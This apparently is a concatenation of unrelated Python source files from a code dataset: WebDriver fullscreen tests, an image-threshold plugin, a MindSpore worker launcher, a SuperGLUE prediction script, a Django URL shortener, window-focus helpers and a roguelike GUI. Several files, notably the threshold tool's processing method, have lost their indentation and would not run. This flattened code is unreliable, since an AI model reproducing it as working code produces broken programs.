    _, session = new_session({"alwaysMatch": {"unhandledPromptBehavior": "accept"}})
    session.url = inline("<title>WD doc title</title>")

    create_dialog(session)("alert", text="accept #1", result_var="accept1")
    expected_title = read_global(session, "document.title")

    response = fullscreen(session)

    assert_success(response, expected_title)
    assert_dialog_handled(session, "accept #1")
    # window.alert() returns undefined however it is handled
    assert read_global(session, "accept1") is None

    expected_title = read_global(session, "document.title")
    create_dialog(session)("confirm", text="accept #2", result_var="accept2")

    response = fullscreen(session)

    assert_success(response, expected_title)
    assert_dialog_handled(session, "accept #2")
    # BUG FIX: the original `assert read_global(...), True` was a bare
    # truthiness assert with True as the failure *message*; accepting a
    # confirm() must yield exactly True.
    assert read_global(session, "accept2") is True

    expected_title = read_global(session, "document.title")
    create_dialog(session)("prompt", text="accept #3", result_var="accept3")

    response = fullscreen(session)

    assert_success(response, expected_title)
    assert_dialog_handled(session, "accept #3")
    # accepting a prompt() with no text entered yields the empty string
    assert read_global(session, "accept3") == ""
# [...]
# 2. Handle any user prompts and return its value if it is an error.
# [...]
# In order to handle any user prompts a remote end must take the following
# steps:
# 2. Run the substeps of the first matching user prompt handler:
#
# [...]
# - missing value default state
# - not in the table of simple dialogs
# 1. Dismiss the current user prompt.
# 2. Return error with error code unexpected alert open.
def test_handle_prompt_missing_value(session, create_dialog):
    """With no unhandledPromptBehavior capability set, an open user prompt is
    dismissed and the command fails with "unexpected alert open"."""
    session.url = inline("<title>WD doc title</title>")

    create_dialog("alert", text="dismiss #1", result_var="dismiss1")

    response = fullscreen(session)

    assert_error(response, "unexpected alert open")
    assert_dialog_handled(session, "dismiss #1")
    # BUG FIX: the original checked the unrelated global "accept1"; the
    # dialog above stored its result in "dismiss1". alert() yields undefined.
    assert read_global(session, "dismiss1") is None

    create_dialog("confirm", text="dismiss #2", result_var="dismiss2")

    response = fullscreen(session)

    assert_error(response, "unexpected alert open")
    assert_dialog_handled(session, "dismiss #2")
    # dismissing a confirm() yields False
    assert read_global(session, "dismiss2") is False

    create_dialog("prompt", text="dismiss #3", result_var="dismiss3")

    response = fullscreen(session)

    assert_error(response, "unexpected alert open")
    assert_dialog_handled(session, "dismiss #3")
    # dismissing a prompt() yields null
    assert read_global(session, "dismiss3") is None
# 4. Call fullscreen an element with the current top-level browsing
# context's active document's document element.
def test_fullscreen(session):
    # step 4: the command puts the document element into fullscreen
    response = fullscreen(session)
    assert_success(response)

    fullscreen_flag = session.execute_script("return window.fullScreen")
    assert fullscreen_flag == True
# 5. Return success with the JSON serialization of the current top-level
# browsing context's window rect.
#
# [...]
#
# A top-level browsing context's window rect is defined as a
# dictionary of the screenX, screenY, width and height attributes of the
# WindowProxy. Its JSON representation is the following:
#
# x
# WindowProxy's screenX attribute.
#
# y
# WindowProxy's screenY attribute.
#
# width
# Width of the top-level browsing context's outer dimensions,
# including any browser chrome and externally drawn window
# decorations in CSS reference pixels.
#
# height
# Height of the top-level browsing context's outer dimensions,
# including any browser chrome and externally drawn window decorations
# in CSS reference pixels.
#
# state
# The top-level browsing context's window state.
#
# [...]
#
# The top-level browsing context has an associated window state which
# describes what visibility state its OS widget window is in. It can be
# in one of the following states:
#
# "maximized"
# The window is maximized.
#
# "minimized"
# The window is iconified.
#
# "normal"
# The window is shown normally.
#
# "fullscreen"
# The window is in full screen mode.
#
# If for whatever reason the top-level browsing context's OS window
# cannot enter either of the window states, or if this concept is not
# applicable on the current system, the default state must be normal.
def test_payload(session):
    response = fullscreen(session)

    # step 5: the response body is the serialized window rect, with numeric
    # x/y/width/height entries.
    assert response.status == 200
    rect = response.body["value"]
    assert isinstance(rect, dict)
    for key in ("width", "height", "x", "y"):
        assert key in rect
        assert isinstance(rect[key], (int, float))
def test_fullscreen_twice_is_idempotent(session):
    def in_fullscreen():
        return session.execute_script("return window.fullScreen")

    assert in_fullscreen() is False

    assert_success(fullscreen(session))
    assert in_fullscreen() is True

    # a second request must also succeed and leave the window fullscreen
    assert_success(fullscreen(session))
    assert in_fullscreen() is True
| StarcoderdataPython |
4834253 | import numpy as np
import cv2
import logging
logger = logging.getLogger(__name__)
from ipapi.base.ipt_abstract import IptBase
import ipapi.base.ip_common as ipc
class IptSplittedRangeThreshold(IptBase):
    def build_params(self):
        """Declare the tool's parameter set (registration order defines the
        UI order in the IPAPI framework)."""
        self.add_enabled_checkbox()
        self.add_channel_selector(default_value="h")
        self.add_checkbox(name="invert", desc="Invert mask", default_value=0)
        self.add_roi_selector()
        # Range threshold applied to pixels inside the linked ROI(s)
        self.add_spin_box(
            name="min_inside_t",
            desc="Threshold min value inside ROI",
            default_value=0,
            minimum=0,
            maximum=255,
        )
        self.add_spin_box(
            name="max_inside_t",
            desc="Threshold max value inside ROI",
            default_value=255,
            minimum=0,
            maximum=255,
        )
        # Range threshold applied to pixels outside the linked ROI(s)
        self.add_spin_box(
            name="min_outside_t",
            desc="Threshold min value outside ROI",
            default_value=0,
            minimum=0,
            maximum=255,
        )
        self.add_spin_box(
            name="max_outside_t",
            desc="Threshold max value outside ROI",
            default_value=255,
            minimum=0,
            maximum=255,
        )
        # 0 disables the median pre-filter; only odd sizes are meaningful
        self.add_spin_box(
            name="median_filter_size",
            desc="Median filter size (odd values only)",
            default_value=0,
            minimum=0,
            maximum=51,
        )
        self.add_morphology_operator()
        self.add_text_overlay(0)
        self.add_checkbox(
            name="build_mosaic",
            desc="Build mosaic",
            default_value=0,
            hint="If true edges and result will be displayed side by side",
        )
        self.add_color_selector(
            name="background_color",
            desc="Background color",
            default_value="none",
            hint="""Color to be used when printing masked image.\n
            if "None" is selected standard mask will be printed.""",
            enable_none=True,
        )
def process_wrapper(self, **kwargs):
"""
Splitted range threshold:
Performs range threshold with two sets of borders applied inside and outside of linked ROIs.
If no ROIs are provided, all image will be considered within ROI.
Real time: True
Keyword Arguments (in parentheses, argument name):
* Activate tool (enabled): Toggle whether or not tool is active
* Channel (channel):
* Invert mask (invert):
* Name of ROI to be used (roi_names): Operation will only be applied inside of ROI
* ROI selection mode (roi_selection_mode):
* Threshold min value inside ROI (min_inside_t):
* Threshold max value inside ROI (max_inside_t):
* Threshold min value outside ROI (min_outside_t):
* Threshold max value outside ROI (max_outside_t):
* Median filter size (odd values only) (median_filter_size):
* Morphology operator (morph_op):
* Kernel size (kernel_size):
* Kernel shape (kernel_shape):
* Iterations (proc_times):
* Overlay text on top of images (text_overlay): Draw description text on top of images
* Build mosaic (build_mosaic): If true edges and result will be displayed side by side
* Background color (background_color):
Color to be used when printing masked image.
if "None" is selected standard mask will be printed.
"""
wrapper = self.init_wrapper(**kwargs)
if wrapper is None:
return False
res = False
try:
if self.get_value_of("enabled") == 1:
img = wrapper.current_image
rois = self.get_ipt_roi(
wrapper=wrapper,
roi_names=self.get_value_of("roi_names").replace(" ", "").split(","),
selection_mode=self.get_value_of("roi_selection_mode"),
)
# Build inside mask
inside_mask, _ = wrapper.get_mask(
src_img=img,
channel=self.get_value_of("channel"),
min_t=self.get_value_of("min_inside_t"),
max_t=self.get_value_of("max_inside_t"),
median_filter_size=self.get_value_of("median_filter_size"),
)
inside_mask = wrapper.keep_rois(src_mask=inside_mask, tags=rois)
wrapper.store_image(
image=inside_mask, text=f"inside_mask_{self.get_value_of('channel')}"
)
# Build outside mask
outside_mask, _ = wrapper.get_mask(
src_img=img,
channel=self.get_value_of("channel"),
min_t=self.get_value_of("min_outside_t"),
max_t=self.get_value_of("max_outside_t"),
median_filter_size=self.get_value_of("median_filter_size"),
)
outside_mask = wrapper.delete_rois(src_mask=outside_mask, tags=rois)
wrapper.store_image(
image=outside_mask, text=f"outside_mask_{self.get_value_of('channel')}"
)
# Merge masks
self.result = wrapper.multi_or(image_list=(inside_mask, outside_mask))
self.result = self.apply_morphology_from_params(self.result)
bck_color = self.get_value_of(key="background_color")
if bck_color != "none":
bck_color = ipc.all_colors_dict[bck_color]
masked_image = wrapper.draw_image(
src_image=wrapper.current_image,
src_mask=self.result,
background=bck_color,
)
wrapper.store_image(masked_image, "masked_image")
main_result_name = "masked_image"
wrapper.store_image(self.result, "mask")
main_image = masked_image
else:
main_result_name = f"threshold_{self.input_params_as_str()}"
main_image = self.result
if self.get_value_of("invert") == 1:
main_image = 255 - main_image
inside_mask = 255 - inside_mask
outside_mask = 255 - outside_mask
dmo_img = np.dstack(
(
main_image,
wrapper.keep_rois(src_mask=main_image, tags=rois),
wrapper.delete_rois(src_mask=main_image, tags=rois),
)
)
for roi in rois:
dmo_img = roi.draw_to(dmo_img, line_width=2, color=ipc.C_LIME)
self.demo_image = dmo_img
text_overlay = self.get_value_of("text_overlay") == 1
if text_overlay:
wrapper.store_image(
main_image,
main_result_name,
text_overlay=self.input_params_as_str(
exclude_defaults=False, excluded_params=("progress_callback",)
).replace(", ", "\n"),
)
else:
wrapper.store_image(main_image, main_result_name, text_overlay=text_overlay)
if self.get_value_of("build_mosaic") == 1:
canvas = wrapper.build_mosaic(
image_names=np.array(["current_image", main_result_name])
)
wrapper.store_image(canvas, "mosaic")
res = True
else:
wrapper.store_image(wrapper.current_image, "current_image")
res = True
except Exception as e:
res = False
wrapper.error_holder.add_error(
new_error_text=f'Failed to process {self. name}: "{repr(e)}"',
new_error_level=35,
target_logger=logger,
)
else:
pass
finally:
return res
@property
def name(self):
return "Splitted range threshold"
@property
def package(self):
return "IPSO Phen"
@property
def real_time(self):
return True
@property
def result_name(self):
return "mask"
@property
def output_kind(self):
return "mask"
@property
def use_case(self):
return ["Threshold"]
@property
def description(self):
return """Performs range threshold with two sets of borders applied inside and outside of linked ROIs.
If no ROIs are provided, all image will be considered within ROI."""
| StarcoderdataPython |
86119 | <gh_stars>100-1000
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Start worker process with single core servable"""
import os
import time
import threading
import signal
import argparse
import psutil
import mindspore_serving.log as logger
from mindspore_serving.server import worker
from mindspore_serving.server.common import check_type
from mindspore_serving._mindspore_serving import ExitSignalHandle_
from mindspore_serving._mindspore_serving import Worker_
_main_thread_exited = False
def start_listening_parent_thread(servable_name, device_id):
    """Start a watchdog thread that exits this worker when the parent dies.

    The thread polls the parent process and the global exit flag; once either
    trips, it stops the worker and SIGTERMs any child processes until they are
    gone (or a ~10 s budget is exhausted).
    """
    def worker_listening_parent_thread():
        parent_process = psutil.Process(os.getppid())
        # Poll until the parent exits or a Ctrl+C / stop signal is recorded.
        while parent_process.is_running() and not ExitSignalHandle_.has_stopped():
            time.sleep(0.1)
        logger.warning(f"Worker {servable_name} device_id {device_id}, detect parent "
                       f"pid={parent_process.pid} has exited or receive Ctrl+C message, worker begin to exit"
                       f", parent running {parent_process.is_running()}, exit status {ExitSignalHandle_.has_stopped()}")
        worker.stop()
        cur_process = psutil.Process(os.getpid())
        for _ in range(100):  # 100x0.1=10s
            try:
                children = cur_process.children(recursive=True)
                # Only finish once all children are gone AND the main thread
                # has left parse_args_and_start().
                if not children and _main_thread_exited:
                    logger.info(f"All current children processes have exited")
                    break
                for child in children:
                    os.kill(child.pid, signal.SIGTERM)
                time.sleep(0.1)
            # pylint: disable=broad-except
            except Exception as e:
                # A child may die between listing and killing; keep retrying.
                logger.warning(f"Kill children catch exception {e}")
    thread = threading.Thread(target=worker_listening_parent_thread)
    thread.start()
def start_worker(servable_directory, servable_name, version_number,
                 device_type, device_id, master_address, dec_key, dec_mode, listening_master=False):
    """Start worker process with single core servable.

    Validates all arguments, optionally starts the parent-watchdog thread,
    builds a unix-domain worker address, and registers the servable with the
    serving framework. On failure the master is notified before re-raising.
    """
    signal.signal(signal.SIGCHLD, signal.SIG_DFL)  # for ccec compiler
    check_type.check_str('servable_directory', servable_directory)
    check_type.check_str('servable_name', servable_name)
    check_type.check_int('version_number', version_number, 0)
    check_type.check_str('device_type', device_type)
    check_type.check_int('device_id', device_id, 0)
    check_type.check_str('master_address', master_address)
    check_type.check_bool('listening_master', listening_master)
    ExitSignalHandle_.start()  # Set flag to running and receive Ctrl+C message
    if listening_master:
        start_listening_parent_thread(servable_name, device_id)
    # for servable_config.py to get device id of current worker.
    os.environ["SERVING_DEVICE_ID"] = str(device_id)
    worker_pid = os.getpid()
    unix_socket_dir = "unix_socket_files"
    try:
        os.mkdir(unix_socket_dir)
    except FileExistsError:
        pass
    worker_address = f"unix:{unix_socket_dir}/serving_worker_{servable_name}_device{device_id}_{worker_pid}"
    if len(worker_address) > 107:  # maximum unix domain socket address length
        # Keep head and tail of the path so it stays (mostly) identifiable.
        worker_address = worker_address[:50] + "___" + worker_address[-50:]
    try:
        worker.start_servable(servable_directory=servable_directory, servable_name=servable_name,
                              version_number=version_number, device_type=device_type, device_id=device_id,
                              master_address=master_address, worker_address=worker_address,
                              dec_key=dec_key, dec_mode=dec_mode)
    except Exception as ex:
        # Tell the master why this worker failed before propagating the error.
        Worker_.notify_failed(master_address,
                              f"{{servable name:{servable_name}, device id:{device_id}, <{ex}>}}")
        raise
def parse_args_and_start():
    """Parse command-line arguments and start a single-core servable worker.

    Intended to be launched as a child process by the serving master. When a
    decryption key is used, it is read from a temporary pipe file (and the
    file is removed) so the key never appears on the command line.
    """
    parser = argparse.ArgumentParser(description="Serving start extra worker")
    parser.add_argument('--servable_directory', type=str, required=True, help="servable directory")
    parser.add_argument('--servable_name', type=str, required=True, help="servable name")
    parser.add_argument('--version_number', type=int, required=True, help="version numbers")
    parser.add_argument('--device_type', type=str, required=True, help="device type")
    parser.add_argument('--device_id', type=str, required=True, help="device id")
    parser.add_argument('--master_address', type=str, required=True, help="master address")
    parser.add_argument('--dec_key_pipe_file', type=str, required=True, help="dec key pipe file")
    parser.add_argument('--dec_mode', type=str, required=True, help="dec mode")
    parser.add_argument('--listening_master', type=str, required=True, help="whether listening master")
    args = parser.parse_args()
    servable_directory = args.servable_directory
    servable_name = args.servable_name
    version_number = int(args.version_number)
    device_type = args.device_type
    device_id = int(args.device_id)
    master_address = args.master_address
    dec_key_pipe = args.dec_key_pipe_file
    if dec_key_pipe != "None":
        with open(dec_key_pipe, "rb") as fp:
            dec_key = fp.read()
        # Remove the temporary key file so the key does not linger on disk.
        if dec_key_pipe.startswith("serving_temp_dec_"):
            os.remove(dec_key_pipe)
    else:
        dec_key = None
    dec_mode = args.dec_mode
    # The flag arrives as a string from the command line; compare directly.
    listening_master = args.listening_master.lower() == "true"
    try:
        start_worker(servable_directory, servable_name, version_number, device_type, device_id, master_address,
                     dec_key, dec_mode, listening_master)
    finally:
        # Signal the watchdog thread that the main thread is done.
        global _main_thread_exited
        _main_thread_exited = True
if __name__ == '__main__':
    # Entry point when launched as a child worker process by the master.
    parse_args_and_start()
| StarcoderdataPython |
176459 | <filename>src/AX.py<gh_stars>10-100
#! -*- coding:utf-8 -*-
# SuperGLUE评测
# AX-b and AX-g
# 思路:基于训练好的RTE模型进行预测
import json
import numpy as np
from six import b
from snippets import *
from bert4keras.snippets import sequence_padding, DataGenerator
from bert4keras.snippets import open
from tqdm import tqdm
# Basic hyper-parameters.
labels = ['entailment', 'not_entailment']  # label order fixes the class ids
num_classes = len(labels)
maxlen = 128    # max combined token length of the premise/hypothesis pair
batch_size = 32
epochs = 10     # NOTE(review): unused in this prediction-only script -- confirm
def load_data(filename, data):
    """Load an RTE-style diagnostic data file.

    Args:
        filename: path to a JSON-lines file.
        data: 'b' for AX-b (uses ``sentence1``/``sentence2`` keys); anything
            else for AX-g (uses ``premise``/``hypothesis`` keys).

    Returns:
        List of ``(text1, text2, label_id)`` tuples. Missing labels default
        to 'entailment' (test sets carry no gold labels).
    """
    D = []
    with open(filename) as f:
        # The line index was previously taken from enumerate() but never used.
        for l in f:
            l = json.loads(l)
            if data == 'b':
                text1, text2, label = l['sentence1'], l['sentence2'], l.get('label', 'entailment')
            else:
                text1, text2, label = l['premise'], l['hypothesis'], l.get('label', 'entailment')
            D.append((text1, text2, labels.index(label)))
    return D
class data_generator(DataGenerator):
    """Batch generator yielding ([token_ids, segment_ids], labels) arrays.
    """
    def __iter__(self, random=False):
        batch_token_ids, batch_segment_ids, batch_labels = [], [], []
        for is_end, (text1, text2, label) in self.sample(random):
            # Encode the sentence pair into one token sequence.
            token_ids, segment_ids = tokenizer.encode(
                text1, text2, maxlen=maxlen
            )
            batch_token_ids.append(token_ids)
            # NOTE(review): all-zero segment ids are emitted instead of the
            # encoder's segment_ids -- looks deliberate here, confirm upstream.
            batch_segment_ids.append([0] * len(segment_ids))
            batch_labels.append([label])
            if len(batch_token_ids) == self.batch_size or is_end:
                # Pad the accumulated batch to a rectangular array and emit it.
                batch_token_ids = sequence_padding(batch_token_ids)
                batch_segment_ids = sequence_padding(batch_segment_ids)
                batch_labels = sequence_padding(batch_labels)
                yield [batch_token_ids, batch_segment_ids], batch_labels
                batch_token_ids, batch_segment_ids, batch_labels = [], [], []
# Build the classification model: pool the base encoder's last layer and add
# a softmax head over the entailment classes.
output = base.model.get_layer(last_layer).output
output = pooling_layer(output)
output = keras.layers.Dense(
    units=num_classes,
    activation='softmax',
    kernel_initializer=base.initializer
)(output)
model = keras.models.Model(base.model.input, output)
model.summary()
model.compile(
    loss='sparse_categorical_crossentropy',
    optimizer=optimizer,
    metrics=['accuracy']
)
def test_predict(in_file, out_file, data='b'):
    """Run the trained RTE model on *in_file* and write predictions to *out_file*.

    The result file follows the SuperGLUE submission format (one JSON object
    per line) and can be uploaded to https://super.gluebenchmark.com/.
    """
    test_data = load_data(in_file, data)
    test_generator = data_generator(test_data, batch_size)

    results = []
    for x_true, _ in tqdm(test_generator, ncols=0):
        y_pred = model.predict(x_true).argmax(axis=1)
        results.extend(y_pred)

    # Use context managers so both files are closed even if a line fails to
    # parse (the original left the output handle open on error).
    with open(out_file, 'w') as fw, open(in_file) as fr:
        for l, r in zip(fr, results):
            l = json.loads(l)
            l = json.dumps({'idx': str(l['idx']), 'label': labels[r]})
            fw.write(l + '\n')
if __name__ == '__main__':
model.load_weights('weights/RTE.weights')
test_predict(
in_file=data_path + 'AX-b/AX-b.jsonl',
out_file='results/AX-b.jsonl',
data='b'
)
test_predict(
in_file=data_path + 'AX-g/AX-g.jsonl',
out_file='results/AX-g.jsonl',
data='g'
)
| StarcoderdataPython |
168893 | from django.conf import settings
from django.http import JsonResponse, HttpResponseNotFound, HttpResponseRedirect
from django.views.decorators.http import require_GET, require_POST
from urlshortening.models import Url, get_short_url, invalidate_url
@require_POST
def get_short_link(request):
    """Create (or look up) a short link for the POSTed ``full_url``."""
    full_url = request.POST.get('full_url', '')
    if not full_url:
        return JsonResponse({"error": "full_url is empty", "data": ""}, status=400)
    max_length = Url._meta.get_field("url").max_length
    if len(full_url) > max_length:
        return JsonResponse({"error": "full_url is too long", "data": ""}, status=400)
    url = get_short_url(full_url)
    payload = {
        "short_id": url.short_id,
        "short_url_path": settings.SHORT_URL_PATH,
    }
    return JsonResponse({"error": "", "data": payload})
@require_GET
def get_full_link(request, short_id):
    """Resolve *short_id* to its full URL, as JSON."""
    try:
        url = Url.objects.get(pk=short_id)
        if url.is_expired:
            return JsonResponse({"error": "Link is expired", "data": ""}, status=404)
    except Url.DoesNotExist:
        return JsonResponse({"error": "Url doesn\'t exist", "data": ""}, status=404)
    return JsonResponse({"error": "", "data": {"full_url": url.url}})
@require_GET
def get_redirect(request, short_id):
    """Redirect the visitor to the full URL behind *short_id*, or 404."""
    try:
        url = Url.objects.get(pk=short_id)
        expired = url.is_expired
    except Url.DoesNotExist:
        return HttpResponseNotFound()
    if expired:
        return HttpResponseNotFound()
    return HttpResponseRedirect(url.url)
@require_POST
def invalidate(request):
    """Mark a short link as expired so it can no longer be resolved."""
    short_id = request.POST.get('short_id', '')
    if not short_id:
        return JsonResponse({"error": "short_id is empty", "data": ""}, status=400)
    try:
        url = Url.objects.get(pk=short_id)
    except Url.DoesNotExist:
        return JsonResponse({"error": "Url doesn\'t exist", "data": ""}, status=404)
    if url.is_expired:
        return JsonResponse({"error": "Link is already expired", "data": ""}, status=400)
    invalidate_url(short_id)
    payload = {"short_id": short_id, "invalidated": "true"}
    return JsonResponse({"error": "", "data": payload})
| StarcoderdataPython |
1778842 | import pylewm.commands
import pylewm.window
import pylewm.monitors
import pythoncom
import win32gui, win32com.client
import win32api
import traceback
import ctypes
from pylewm.commands import PyleCommand
# Dedicated queue whose thread performs the actual win32 focus switches.
FocusQueue = pylewm.commands.CommandQueue()
# Module-level focus state, maintained elsewhere in pylewm.
FocusSpace = None
FocusWindow = None
LastFocusWindow = None
WindowFocusedSince = None
@PyleCommand
def focus_monitor(monitor_index):
    """Switch focus to the visible space of the monitor at *monitor_index*."""
    target = pylewm.monitors.get_monitor_by_index(monitor_index)
    set_focus_space(target.visible_space)
def set_focus(window):
    """Queue a focus switch to *window*, moving the mouse into its rect."""
    print(f"Focus Window {window.window_title}")
    handle = window.handle
    target_rect = window.rect.copy()
    FocusQueue.queue_command(lambda: focus_window_handle(handle, target_rect))
def set_focus_no_mouse(window):
    """Queue a focus switch to *window* without repositioning the mouse."""
    print(f"Focus Window {window.window_title}")
    handle = window.handle
    FocusQueue.queue_command(lambda: focus_window_handle(handle, None))
def set_focus_space(space):
    """Focus the most relevant window of *space*, or its bare monitor."""
    if space.last_focus:
        # Prefer whatever was focused last within this space.
        set_focus(space.last_focus)
        return
    if space.windows:
        set_focus(space.windows[0])
        return
    # Empty space: focus the monitor itself (desktop shell window).
    set_focus_monitor(space.monitor)
def set_focus_monitor(monitor):
    """Queue focus onto the desktop shell window, parking the mouse on *monitor*."""
    shell_hwnd = ctypes.windll.user32.GetShellWindow()
    monitor_rect = monitor.rect.copy()
    FocusQueue.queue_command(lambda: focus_window_handle(shell_hwnd, monitor_rect))
def get_cursor_position():
    # Screen coordinates of the mouse cursor as an (x, y) tuple.
    return win32gui.GetCursorPos()
def get_cursor_space():
    """Return the visible space under the mouse, falling back to the default monitor."""
    monitor = (pylewm.monitors.get_monitor_at(get_cursor_position())
               or pylewm.monitors.get_default_monitor())
    return monitor.visible_space
def get_focused_space():
    """Return the space that should currently be considered focused."""
    cursor_space = get_cursor_space()
    # An empty space under the mouse wins over the focused window's space:
    # when the last window loses focus, Windows hands focus to an arbitrary
    # window, so the focused window is not trustworthy in that situation.
    if not cursor_space.windows:
        return cursor_space
    focused = pylewm.focus.FocusWindow
    if focused and focused.space and focused.space.visible:
        return focused.space
    return cursor_space
def get_focused_monitor():
    # Monitor owning the currently focused space.
    space = get_focused_space()
    return space.monitor
ComInitialized = False
def focus_window_handle(hwnd, rect=None, num=10):
    """Give keyboard focus to *hwnd*; optionally park the mouse inside *rect*.

    Runs on the FocusQueue thread. Windows may refuse a foreground change, so
    on failure the call re-queues itself up to *num* more times before giving
    up with an error message.
    """
    try:
        global ComInitialized
        if not ComInitialized:
            # COM must be initialized once per thread before using WScript.Shell.
            pythoncom.CoInitialize()
            ComInitialized = True
        # Send a bogus key to ourselves so we are
        # marked as having received keyboard input, which
        # makes windows determine we have the power to change
        # window focus. Somehow.
        shell = win32com.client.Dispatch("WScript.Shell")
        shell.SendKeys('{F15}')
        win32gui.SetForegroundWindow(hwnd)
        if rect:
            try:
                # Nudge the cursor just inside the window's top-left corner.
                win32api.SetCursorPos((rect.left + 20, rect.top + 10))
            except:
                pass # Not allowed, probably an administrator window has focus or something
                #traceback.print_exc()
        return True
    except Exception as ex:
        # Try it a few more times. Maybe windows will let us do it later.
        if num > 0:
            FocusQueue.queue_command(lambda: focus_window_handle(hwnd, rect, num-1))
        else:
            print("Error: Could not switch focus to window: "+win32gui.GetWindowText(hwnd))
            print("Is HKCU\Control Panel\Desktop\ForegroundLockTimeout set to 0?")
            traceback.print_exc()
            traceback.print_stack()
| StarcoderdataPython |
3394319 | <gh_stars>1-10
import tdl
from utils import Colors
import logging
import textwrap
from models.EnumStatus import EGameState
from models.GenericObjects import Vector2
from managers import Messenger
logger = logging.getLogger('Rogue-EVE')
class GameState(object):
    """Mutable wrapper around the current EGameState of the game."""

    def __init__(self, state: "EGameState"):
        self.state = state

    def get_state(self):
        """Return the wrapped state value."""
        return self.state

    def set_state(self, state):
        """Replace the wrapped state value."""
        self.state = state

    def __eq__(self, other):
        # Bug fix: the original defined __cmp__, which Python 3 ignores for
        # the == operator, so `game_state == some_state` silently fell back
        # to identity comparison. __eq__ restores the intended semantics of
        # comparing the wrapped state against *other* directly.
        return self.state == other

    # Keep instances hashable (by identity) as they were before __eq__ existed.
    __hash__ = object.__hash__

    # Backward compatibility for any caller invoking __cmp__ directly.
    __cmp__ = __eq__
class CollisionHandler(object):
    """Answers blocking/collision queries against the map tiles and the object pool."""

    def __init__(self, map=None, object_pool=None):
        self.map = map
        self.object_pool = object_pool

    def set_map(self, map):
        self.map = map

    def set_object_pool(self, object_pool):
        self.object_pool = object_pool

    def get_visible_tiles(self):
        # Tiles currently visible according to the map's FOV computation.
        return self.map.get_map().visible_tiles

    def is_blocked(self, x, y):
        """Return True when (x, y) is blocked by terrain or by a blocking object."""
        if self.map.get_map()[x][y].blocked:
            logger.debug(
                "CollisionHandler [collided_with={} position={}]".format(self.map.get_map()[x][y], Vector2(x, y)))
            return True
        # now check for any blocking objects
        for obj in self.object_pool.get_objects_as_list():
            if obj.blocks and obj.coord == Vector2(x, y):
                logger.debug("CollisionHandler [collided_with={} position={}]".format(obj.name, obj.coord))
                return True
        return False

    def collides_with(self, this, x, y):
        """Return the blocking object (other than *this*) at (x, y), or None if free."""
        for obj in self.object_pool.get_objects_as_list():
            if obj.blocks and obj.coord.X == x and obj.coord.Y == y and this._id != obj._id:
                logger.debug("CollisionHandler [collided_with={} position={}]".format(obj.name, obj.coord))
                return obj
class ConsoleBuffer(object):
    """A tdl console region: renders the map, objects, GUI bars and messages,
    and tracks camera position plus field-of-view recomputation."""

    def __init__(self,
                 root,
                 object_pool=None,
                 map=None,
                 width: int=0,
                 height: int=0,
                 origin: Vector2=None,
                 target: Vector2=None,
                 console: object=None,
                 mouse_controller=None,
                 map_width=None,
                 map_height=None,
                 camera_width=None,
                 camera_height=None,
                 ):
        self.object_pool = object_pool
        self.map = map
        self.root = root
        # Use the supplied console, otherwise allocate a fresh one.
        if console:
            self.console = console
        else:
            self.console = tdl.Console(width, height)
        self.origin = origin
        self.target = target
        self.height = height
        self.width = width
        # FOV bookkeeping: recompute on first draw.
        self.fov_recompute = True
        self.fov_algorithm = 'SHADOW'
        self.fov_light_walls = True
        self.visible_tiles = None
        # GUI elements (stat bars, extra labels) and message-log state.
        self.bars = []
        self.game_msg = None
        self.message_height = None
        self.message_width = None
        self.message_origin_x = None
        self.message_origin_y = None
        self.map_width = map_width
        self.map_height = map_height
        self.camera_height = camera_height
        self.camera_width = camera_width
        self.camera_coord = Vector2(0, 0)
        self.mouse_controller = mouse_controller
        self.extras = []

    def set_mouse_controller(self, mouse_controller):
        self.mouse_controller = mouse_controller

    def set_fov_recompute(self, val: bool):
        self.fov_recompute = val

    def reset_fov_recompute(self):
        self.fov_recompute = False

    def fov_must_recompute(self):
        return self.fov_recompute

    def add_extra(self, x, y, name, obj, char_color, back_color):
        """Register a plain "name: value" label drawn on the GUI panel.

        :param x: x position relative to the console origin
        :param y: y position relative to the console origin
        :param name: label printed before the value
        :param obj: object whose str() value is printed
        :param char_color: foreground color of the text
        :param back_color: background color of the text
        """
        self.extras.append(
            {
                'x': x,
                'y': y,
                'name': name,
                'obj': obj,
                'char_color': char_color,
                'back_color': back_color
            }
        )

    def add_bar(self, x, y, total_width, name, value_name, maximum_value_name, obj, bar_color, back_color):
        """
        To add a bar you need to simply apply this template to the bar, filling the blanks
        :param x: position relative in x to the console origin
        :param y: position relative in y to the console origin
        :param total_width: total width in chars of the bar
        :param name: name of this bar to be printed
        :param value_name: string name of the variable in the object you are passing
        :param maximum_value_name: string name of the variable that holds the maximum value of the variable of interest
        :param obj: object which holds the values of interest to be shown
        :param bar_color: color of the filling of the bar
        :param back_color: color of the background of the bar
        :return:
        """
        self.bars.append(
            {
                'x': x,
                'y': y,
                'value_name': value_name,
                'maximum_value_name': maximum_value_name,
                'total_width': total_width,
                'name': name,
                'obj': obj,
                'bar_color': bar_color,
                'back_color': back_color
            }
        )

    def render_gui(self):
        """Draw all bars, extra labels, the message log and mouse-over names."""
        # prepare to render the GUI panel
        self.console.clear(fg=Colors.white, bg=Colors.black)
        for args in self.bars:
            # render a bar (HP, experience, etc). first calculate the width of the bar
            obj = args['obj']
            value = obj.__getattribute__(args['value_name'])
            maximum = obj.__getattribute__(args['maximum_value_name'])
            bar_width = int(float(value) / maximum * args['total_width'])
            # render the background first
            self.console.draw_rect(args['x'], args['y'], args['total_width'], 1, None, bg=args['back_color'])
            # now render the bar on top
            if bar_width > 0:
                self.console.draw_rect(args['x'], args['y'], bar_width, 1, None, bg=args['bar_color'])
            # finally, some centered text with the values
            text = "{}: {}/{}".format(args['name'], int(value), int(maximum))
            x_centered = args['x'] + (args['total_width'] - len(text)) // 2
            self.console.draw_str(x_centered, args['y'], text, fg=Colors.white, bg=None)
        for args in self.extras:
            # render a plain "name: value" label
            value = args['obj']
            text = "{}: {}".format(args['name'], value)
            self.console.draw_str(args['x'], args['y'], text, fg=args["char_color"], bg=args['back_color'])
        y = self.message_origin_y
        for (line, color) in self.game_msg:
            self.console.draw_str(self.message_origin_x, y, line, bg=None, fg=color)
            y += 1
        if self.mouse_controller:
            self.console.draw_str(1, 0, self.mouse_controller.get_names_under_mouse(), bg=None, fg=Colors.light_gray)
